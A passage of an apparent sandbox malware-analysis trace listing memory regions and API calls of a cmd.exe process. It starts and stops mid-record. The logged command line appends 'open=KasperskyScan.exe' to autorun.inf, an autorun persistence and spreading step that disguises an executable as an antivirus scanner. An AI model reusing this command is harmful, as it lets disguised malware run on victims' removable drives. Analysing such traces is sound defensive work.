entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 557 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 558 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 559 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 560 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 561 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 562 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 563 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 564 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 565 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 566 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 567 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 568 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 569 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 570 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 571 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 572 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 573 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 574 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 575 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 576 start_va = 0x4f0000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 577 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 578 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 579 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 580 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 581 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 663 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 664 start_va = 0x4f0000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 665 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 666 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 667 start_va = 0x760000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 668 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 669 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Thread: id = 15 os_tid = 0xa58 [0146.238] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0146.238] __set_app_type (_Type=0x1) [0146.239] __p__fmode () returned 0x74ac4d6c [0146.239] __p__commode () returned 0x74ac5b1c [0146.239] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0146.239] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0146.239] GetCurrentThreadId () returned 0xa58 [0146.239] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa58) returned 0x84 [0146.239] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0146.239] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0146.239] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.244] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0146.244] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0146.244] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.244] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0146.244] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0146.244] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.244] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0146.244] GetConsoleOutputCP () returned 0x1b5 [0146.246] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0146.246] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0146.246] _get_osfhandle (_FileHandle=1) returned 0x3c [0146.246] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0146.247] _get_osfhandle (_FileHandle=1) returned 0x3c [0146.247] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0146.248] _get_osfhandle (_FileHandle=1) returned 0x3c [0146.248] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0146.250] _get_osfhandle (_FileHandle=0) returned 0x38 [0146.257] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0146.269] _get_osfhandle (_FileHandle=0) returned 0x38 [0146.269] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0146.274] GetEnvironmentStringsW () returned 0x667d28* [0146.275] GetProcessHeap () returned 0x660000 [0146.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xa1a) returned 0x668750 [0146.275] FreeEnvironmentStringsA (penv="A") returned 1 [0146.275] GetProcessHeap () returned 0x660000 [0146.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x4) returned 0x660550 [0146.275] GetEnvironmentStringsW () returned 0x667d28* [0146.275] GetProcessHeap () returned 0x660000 [0146.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xa1a) returned 0x669178 [0146.275] FreeEnvironmentStringsA (penv="A") returned 1 [0146.275] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0146.275] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0146.275] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0146.275] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0146.275] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0146.275] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0146.275] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0146.275] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0146.276] RegCloseKey (hKey=0x94) returned 0x0 [0146.276] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0146.276] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0146.276] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0146.276] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0146.276] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0146.276] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0146.276] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0146.276] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0146.276] RegCloseKey (hKey=0x94) returned 0x0 [0146.276] time (in: timer=0x0 | out: timer=0x0) returned 0x620b74ac [0146.276] srand (_Seed=0x620b74ac) [0146.276] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C echo ^open^=KasperskyScan^.exe >>autorun.inf" [0146.276] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C echo ^open^=KasperskyScan^.exe >>autorun.inf" [0146.276] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0146.276] GetProcessHeap () returned 0x660000 [0146.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x210) returned 0x669ba0 [0146.277] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x669ba8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0146.277] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0146.277] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0146.277] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.277] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0146.277] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0146.277] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0146.277] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0146.277] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0146.277] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0146.277] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0146.277] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0146.277] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0146.277] GetProcessHeap () returned 0x660000 [0146.278] RtlFreeHeap (HeapHandle=0x660000, Flags=0x0, BaseAddress=0x668750) returned 1 [0146.278] GetEnvironmentStringsW () returned 0x667d28* [0146.278] GetProcessHeap () returned 0x660000 [0146.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xa32) returned 0x66a7f8 [0146.278] FreeEnvironmentStringsA (penv="A") returned 1 [0146.278] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0146.278] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.278] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0146.278] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0146.278] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0146.278] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0146.278] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0146.278] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0146.278] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0146.278] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0146.278] GetProcessHeap () returned 0x660000 [0146.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x44) returned 0x6605c8 [0146.278] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0146.279] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0146.279] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0146.279] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x660618 [0146.279] FindClose (in: hFindFile=0x660618 | out: hFindFile=0x660618) returned 1 [0146.279] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x660618 [0146.279] FindClose (in: hFindFile=0x660618 | out: hFindFile=0x660618) returned 1 [0146.279] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0146.280] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x660618 [0146.280] FindClose (in: hFindFile=0x660618 | out: hFindFile=0x660618) returned 1 [0146.280] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0146.280] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0146.280] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0146.280] GetProcessHeap () returned 0x660000 [0146.280] RtlFreeHeap (HeapHandle=0x660000, Flags=0x0, BaseAddress=0x66a7f8) returned 1 [0146.280] GetEnvironmentStringsW () returned 0x667d28* [0146.280] GetProcessHeap () returned 0x660000 [0146.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xa76) returned 0x669db8 [0146.280] FreeEnvironmentStringsA (penv="=") returned 1 [0146.280] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0146.281] GetProcessHeap () returned 0x660000 [0146.281] RtlFreeHeap (HeapHandle=0x660000, Flags=0x0, BaseAddress=0x6605c8) returned 1 [0146.281] GetProcessHeap () returned 0x660000 [0146.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x400e) returned 0x66bcb8 [0146.281] GetProcessHeap () returned 0x660000 [0146.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x66) returned 0x66a838 [0146.281] GetProcessHeap () returned 0x660000 [0146.282] RtlFreeHeap (HeapHandle=0x660000, Flags=0x0, BaseAddress=0x66bcb8) returned 1 [0146.282] GetConsoleOutputCP () returned 0x1b5 [0146.290] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0146.290] GetUserDefaultLCID () returned 0x409 [0146.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0146.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0146.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0146.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0146.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0146.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0146.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0146.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0146.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0146.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0146.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0146.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0146.290] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0146.291] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0146.291] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0146.292] GetProcessHeap () returned 0x660000 [0146.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20c) returned 0x66a8f0 [0146.292] GetConsoleTitleW (in: lpConsoleTitle=0x66a8f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0146.292] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0146.292] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0146.293] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0146.293] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0146.293] GetProcessHeap () returned 0x660000 [0146.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x400a) returned 0x66bcb8 [0146.293] GetProcessHeap () returned 0x660000 [0146.293] RtlFreeHeap (HeapHandle=0x660000, Flags=0x0, BaseAddress=0x66bcb8) returned 1 [0146.294] _wcsicmp (_String1="echo", _String2=")") returned 60 [0146.294] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0146.294] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0146.294] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0146.294] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0146.294] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0146.294] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0146.294] GetProcessHeap () returned 0x660000 [0146.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x58) returned 0x66ab08 [0146.294] GetProcessHeap () returned 0x660000 [0146.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x12) returned 0x667590 [0146.295] GetProcessHeap () returned 0x660000 [0146.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3a) returned 0x66ab68 [0146.295] GetProcessHeap () returned 0x660000 [0146.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x20) returned 0x660578 [0146.295] GetProcessHeap () returned 0x660000 [0146.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x20) returned 0x66abb0 [0146.296] GetProcessHeap () returned 0x660000 [0146.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x18) returned 0x667630 [0146.296] _get_osfhandle (_FileHandle=1) returned 0x3c [0146.296] _get_osfhandle (_FileHandle=1) returned 0x3c [0146.296] _get_osfhandle (_FileHandle=1) returned 0x3c [0146.296] GetFileType (hFile=0x3c) returned 0x2 [0146.296] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0146.296] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19fc74 | out: lpMode=0x19fc74) returned 1 [0146.297] _dup (_FileHandle=1) returned 3 [0146.297] _close (_FileHandle=1) returned 0 [0146.297] _wcsicmp (_String1="autorun.inf", _String2="con") returned -2 [0146.297] CreateFileW (lpFileName="autorun.inf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\autorun.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x19fc54, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0146.297] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 1 [0146.297] _get_osfhandle (_FileHandle=1) returned 0x3c [0146.297] GetFileType (hFile=0x3c) returned 0x1 [0146.297] GetFileSize (in: hFile=0x3c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc [0146.297] SetFilePointer (in: hFile=0x3c, lDistanceToMove=-1, 